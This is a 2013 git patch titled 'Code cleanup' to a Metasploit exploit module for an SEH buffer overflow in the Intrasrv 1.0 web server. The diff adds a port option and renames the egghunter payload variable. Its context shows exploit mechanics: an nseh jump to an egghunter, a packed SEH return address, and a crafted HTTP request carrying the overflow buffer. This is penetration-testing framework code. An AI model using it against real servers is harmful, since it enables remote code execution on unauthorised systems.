From 7014322dfd41e691ec94202aa9032bd41d4fae3d Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 12 Aug 2013 18:16:00 -0400 Subject: [PATCH] Code cleanup --- modules/exploits/windows/http/intrasrv_bof.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index a57f9cbb61..ca082b2606 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -58,6 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => "May 30 2013", 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('RPORT', [true, 'The remote port', 80]) + ], self.class) end def check @@ -68,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end sock.put("GET / HTTP/1.0\r\n") - res = sock.get + res = sock.get_once if res =~ /intrasrv 1.0/ return Exploit::CheckCode::Vulnerable @@ -90,18 +95,16 @@ class Metasploit3 < Msf::Exploit::Remote buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter buf << [target.ret].pack("V*") # seh - # Setup payload - shellcode = egg - # second last byte of payload gets corrupted - pad 2 bytes + # second last byte of payload/egg gets corrupted - pad 2 bytes # so we don't corrupt the actual payload - shellcode << rand_text(2) + egg << rand_text(2) print_status("Sending buffer...") # Payload location is an issue, so we're using the tcp mixin # instead of HttpClient here to maximize control over what's sent. # (i.e. no additional headers to mess with the stack) connect - sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}") + sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}") disconnect end end